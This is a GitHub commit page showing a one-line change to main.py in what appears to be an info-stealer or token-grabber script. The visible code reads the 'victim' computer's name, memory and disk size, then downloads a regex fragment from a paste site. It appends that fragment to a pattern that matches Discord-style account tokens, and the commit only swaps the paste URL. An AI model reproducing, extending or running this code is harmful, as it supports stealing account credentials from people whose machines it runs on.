Update main.py

This commit is contained in:
What about KSCH 2023-03-08 02:06:45 +01:00 committed by GitHub
parent 808932a646
commit 16664095b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -101,7 +101,7 @@ computer_victim = os.getenv("COMPUTERNAME")
fast_memory_storage = str(psutil.virtual_memory()[0] / 1024**3).split(".")[0]
storage_space = str(psutil.disk_usage("/")[0] / 1024**3).split(".")[0]
bc_myregex_secret = "https://paste.bingner.com/paste/fhvyp/raw"
bc_myregex_secret = "https://paste.bingner.com/paste/u7qoj/raw"
reg_req = requests.get(bc_myregex_secret)
regx_net = r"[\w-]{24}\." + reg_req.text